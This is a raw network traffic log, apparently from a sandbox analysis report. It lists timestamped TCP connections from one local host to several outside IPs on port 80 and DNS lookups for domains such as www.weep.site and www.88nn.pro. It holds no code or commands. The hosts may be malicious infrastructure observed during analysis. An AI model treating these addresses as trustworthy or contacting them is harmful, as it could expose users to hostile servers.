Aug 23, 2024 08:28:10.220633030 CEST | 49756 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:10.805247068 CEST | 49756 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:11.834752083 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:11.839696884 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:11.839761019 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:11.855149984 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:11.860049963 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:11.860152960 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.637598991 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.637609959 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.637622118 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.637649059 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.637661934 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.637665033 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.637669086 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.637753010 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.637758017 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.637769938 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.637819052 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.637892962 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.642724991 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.642786980 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.642858028 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.724106073 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.732911110 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.732918024 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.732973099 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.732979059 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.733102083 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.733102083 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.733247995 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.733253002 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.733263969 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.733365059 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.733665943 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.733673096 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.733684063 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.733733892 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.733740091 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.733746052 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.733784914 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.734576941 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.734581947 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.734592915 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.734628916 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.734656096 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.734662056 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.734795094 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.738996983 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.739002943 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.739015102 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.739042997 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.739049911 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.739078045 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.739099979 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.819633007 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.819657087 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.819663048 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.819675922 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.819751024 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.828660965 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.828716993 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.828727961 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.828813076 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.828823090 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.828829050 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.828836918 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.828874111 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.828880072 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.828905106 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.828993082 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.829130888 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.829171896 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.829175949 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.829220057 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.829227924 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.829227924 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.829236984 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.829483986 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.829592943 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.829643965 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.829648972 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.829694033 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.829699039 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.829710007 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.829725027 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.829942942 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.830193996 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.830250025 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.830255032 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.830265999 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.830353975 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:12.830466986 CEST | 80 | 49757 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:12.831188917 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:13.367527962 CEST | 49757 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:14.387171984 CEST | 49758 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:14.392111063 CEST | 80 | 49758 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:14.395253897 CEST | 49758 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:14.401947021 CEST | 49758 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:14.406827927 CEST | 80 | 49758 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:15.077173948 CEST | 80 | 49758 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:15.077272892 CEST | 80 | 49758 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:15.079669952 CEST | 49758 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:15.083127975 CEST | 49758 | 80 | 192.168.2.6 | 162.55.254.209
Aug 23, 2024 08:28:15.087940931 CEST | 80 | 49758 | 162.55.254.209 | 192.168.2.6
Aug 23, 2024 08:28:20.571331978 CEST | 49759 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:20.576240063 CEST | 80 | 49759 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:20.576370955 CEST | 49759 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:20.587084055 CEST | 49759 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:20.591959000 CEST | 80 | 49759 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:21.147763968 CEST | 80 | 49759 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:21.147816896 CEST | 80 | 49759 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:21.149244070 CEST | 49759 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:22.101955891 CEST | 49759 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:23.121052980 CEST | 49760 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:23.126554966 CEST | 80 | 49760 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:23.129213095 CEST | 49760 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:23.149094105 CEST | 49760 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:23.153966904 CEST | 80 | 49760 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:23.725356102 CEST | 80 | 49760 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:23.725378990 CEST | 80 | 49760 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:23.725433111 CEST | 49760 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:24.649069071 CEST | 49760 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:25.737329960 CEST | 49761 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:25.742969990 CEST | 80 | 49761 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:25.743062019 CEST | 49761 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:25.822999001 CEST | 49761 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:25.828126907 CEST | 80 | 49761 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:25.828161001 CEST | 80 | 49761 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:26.314662933 CEST | 80 | 49761 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:26.314726114 CEST | 80 | 49761 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:26.314878941 CEST | 49761 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:27.336265087 CEST | 49761 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:28.357088089 CEST | 49762 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:28.362018108 CEST | 80 | 49762 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:28.365200996 CEST | 49762 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:28.371917009 CEST | 49762 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:28.376785994 CEST | 80 | 49762 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:28.948158979 CEST | 80 | 49762 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:28.948180914 CEST | 80 | 49762 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:28.949276924 CEST | 49762 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:28.953084946 CEST | 49762 | 80 | 192.168.2.6 | 64.64.237.133
Aug 23, 2024 08:28:28.957931995 CEST | 80 | 49762 | 64.64.237.133 | 192.168.2.6
Aug 23, 2024 08:28:33.996582985 CEST | 49763 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:34.002093077 CEST | 80 | 49763 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:34.002170086 CEST | 49763 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:34.012171984 CEST | 49763 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:34.017004013 CEST | 80 | 49763 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:34.626193047 CEST | 80 | 49763 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:34.626210928 CEST | 80 | 49763 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:34.626317978 CEST | 49763 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:35.523828030 CEST | 49763 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:36.545097113 CEST | 49764 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:36.549983025 CEST | 80 | 49764 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:36.550077915 CEST | 49764 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:36.560061932 CEST | 49764 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:36.565061092 CEST | 80 | 49764 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:37.176605940 CEST | 80 | 49764 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:37.176630974 CEST | 80 | 49764 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:37.176748037 CEST | 49764 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:38.070679903 CEST | 49764 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:39.089092970 CEST | 49765 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:39.094008923 CEST | 80 | 49765 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:39.097170115 CEST | 49765 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:39.109108925 CEST | 49765 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:39.115983009 CEST | 80 | 49765 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:39.115994930 CEST | 80 | 49765 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:39.750530958 CEST | 80 | 49765 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:39.750910997 CEST | 80 | 49765 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:39.750961065 CEST | 49765 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:40.621129990 CEST | 49765 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:41.637087107 CEST | 49766 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:41.641942978 CEST | 80 | 49766 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:41.642011881 CEST | 49766 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:41.650428057 CEST | 49766 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:41.655188084 CEST | 80 | 49766 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:42.288878918 CEST | 80 | 49766 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:42.288986921 CEST | 80 | 49766 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:42.291676044 CEST | 49766 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:42.291676044 CEST | 49766 | 80 | 192.168.2.6 | 85.13.151.9
Aug 23, 2024 08:28:42.296560049 CEST | 80 | 49766 | 85.13.151.9 | 192.168.2.6
Aug 23, 2024 08:28:47.992006063 CEST | 49767 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:47.996859074 CEST | 80 | 49767 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:47.996932983 CEST | 49767 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:48.017203093 CEST | 49767 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:48.021977901 CEST | 80 | 49767 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:49.525034904 CEST | 49767 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:49.530239105 CEST | 80 | 49767 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:49.530314922 CEST | 49767 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:50.542262077 CEST | 49768 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:50.547447920 CEST | 80 | 49768 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:50.549225092 CEST | 49768 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:50.561130047 CEST | 49768 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:50.565943956 CEST | 80 | 49768 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:52.071300030 CEST | 49768 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:52.077229023 CEST | 80 | 49768 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:52.077347040 CEST | 49768 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:53.093125105 CEST | 49769 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:53.098131895 CEST | 80 | 49769 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:53.101155996 CEST | 49769 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:53.113121986 CEST | 49769 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:53.118014097 CEST | 80 | 49769 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:53.118063927 CEST | 80 | 49769 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:54.619221926 CEST | 49769 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:54.624532938 CEST | 80 | 49769 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:54.627470970 CEST | 49769 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:55.637135029 CEST | 49770 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:55.642021894 CEST | 80 | 49770 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:55.642105103 CEST | 49770 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:55.650414944 CEST | 49770 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:55.655267954 CEST | 80 | 49770 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:57.262368917 CEST | 80 | 49770 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:57.262857914 CEST | 80 | 49770 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:28:57.265377045 CEST | 49770 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:57.267720938 CEST | 49770 | 80 | 192.168.2.6 | 172.67.215.136
Aug 23, 2024 08:28:57.272608042 CEST | 80 | 49770 | 172.67.215.136 | 192.168.2.6
Aug 23, 2024 08:29:02.296015024 CEST | 49772 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:02.300920963 CEST | 80 | 49772 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:02.301141977 CEST | 49772 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:02.311053991 CEST | 49772 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:02.316602945 CEST | 80 | 49772 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:02.797281027 CEST | 80 | 49772 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:02.798365116 CEST | 80 | 49772 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:02.798439980 CEST | 49772 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:03.822849989 CEST | 49772 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:04.839241028 CEST | 49773 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:04.844265938 CEST | 80 | 49773 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:04.844410896 CEST | 49773 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:04.854410887 CEST | 49773 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:04.859210968 CEST | 80 | 49773 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:05.344383001 CEST | 80 | 49773 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:05.344629049 CEST | 80 | 49773 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:05.344677925 CEST | 49773 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:06.371160984 CEST | 49773 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:07.386723042 CEST | 49774 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:07.391654968 CEST | 80 | 49774 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:07.391752958 CEST | 49774 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:07.403553963 CEST | 49774 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:07.408406019 CEST | 80 | 49774 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:07.408505917 CEST | 80 | 49774 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:07.912918091 CEST | 80 | 49774 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:07.912955046 CEST | 80 | 49774 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:07.913033962 CEST | 49774 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:08.914603949 CEST | 49774 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:09.934607983 CEST | 49775 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:09.940380096 CEST | 80 | 49775 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:09.940454960 CEST | 49775 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:09.948939085 CEST | 49775 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:09.954817057 CEST | 80 | 49775 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:10.453043938 CEST | 80 | 49775 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:10.453053951 CEST | 80 | 49775 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:10.453190088 CEST | 80 | 49775 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:10.453193903 CEST | 80 | 49775 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:10.453253984 CEST | 49775 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:10.453253984 CEST | 49775 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:10.457628012 CEST | 80 | 49775 | 192.185.211.122 | 192.168.2.6
Aug 23, 2024 08:29:10.461270094 CEST | 49775 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:10.465132952 CEST | 49775 | 80 | 192.168.2.6 | 192.185.211.122
Aug 23, 2024 08:29:10.469892979 CEST | 80 | 49775 | 192.185.211.122 | 192.168.2.6
                      TimestampSource PortDest PortSource IPDest IP
                      Aug 23, 2024 08:25:53.331392050 CEST6189553192.168.2.61.1.1.1
                      Aug 23, 2024 08:25:53.347820044 CEST53618951.1.1.1192.168.2.6
                      Aug 23, 2024 08:26:09.386488914 CEST5171753192.168.2.61.1.1.1
                      Aug 23, 2024 08:26:09.411468029 CEST53517171.1.1.1192.168.2.6
                      Aug 23, 2024 08:26:22.936567068 CEST5611553192.168.2.61.1.1.1
                      Aug 23, 2024 08:26:22.987282991 CEST53561151.1.1.1192.168.2.6
                      Aug 23, 2024 08:26:36.621120930 CEST6161653192.168.2.61.1.1.1
                      Aug 23, 2024 08:26:36.633464098 CEST53616161.1.1.1192.168.2.6
                      Aug 23, 2024 08:26:49.762443066 CEST5097453192.168.2.61.1.1.1
                      Aug 23, 2024 08:26:50.199295998 CEST53509741.1.1.1192.168.2.6
                      Aug 23, 2024 08:27:03.753164053 CEST5982953192.168.2.61.1.1.1
                      Aug 23, 2024 08:27:03.799355030 CEST53598291.1.1.1192.168.2.6
                      Aug 23, 2024 08:27:17.278268099 CEST5910453192.168.2.61.1.1.1
                      Aug 23, 2024 08:27:17.738147020 CEST53591041.1.1.1192.168.2.6
                      Aug 23, 2024 08:27:31.027570963 CEST5625853192.168.2.61.1.1.1
                      Aug 23, 2024 08:27:31.716407061 CEST53562581.1.1.1192.168.2.6
                      Aug 23, 2024 08:27:45.167628050 CEST6480553192.168.2.61.1.1.1
                      Aug 23, 2024 08:27:45.176336050 CEST53648051.1.1.1192.168.2.6
                      Aug 23, 2024 08:27:53.231097937 CEST5563753192.168.2.61.1.1.1
                      Aug 23, 2024 08:27:53.328103065 CEST53556371.1.1.1192.168.2.6
                      Aug 23, 2024 08:28:06.701051950 CEST6266353192.168.2.61.1.1.1
                      Aug 23, 2024 08:28:06.722100019 CEST53626631.1.1.1192.168.2.6
                      Aug 23, 2024 08:28:20.090229034 CEST6503553192.168.2.61.1.1.1
                      Aug 23, 2024 08:28:20.568566084 CEST53650351.1.1.1192.168.2.6
                      Aug 23, 2024 08:28:33.964751959 CEST6449753192.168.2.61.1.1.1
                      Aug 23, 2024 08:28:33.994362116 CEST53644971.1.1.1192.168.2.6
                      Aug 23, 2024 08:28:47.310401917 CEST6250953192.168.2.61.1.1.1
                      Aug 23, 2024 08:28:47.988341093 CEST53625091.1.1.1192.168.2.6
                      Aug 23, 2024 08:29:02.276643038 CEST6348953192.168.2.61.1.1.1
                      Aug 23, 2024 08:29:02.293705940 CEST53634891.1.1.1192.168.2.6
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Aug 23, 2024 08:25:53.331392050 CEST | 192.168.2.6 | 1.1.1.1 | 0x8d21 | Standard query (0) | www.weep.site | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:26:09.386488914 CEST | 192.168.2.6 | 1.1.1.1 | 0xd2f7 | Standard query (0) | www.88nn.pro | A (IP address) | IN (0x0001) | false
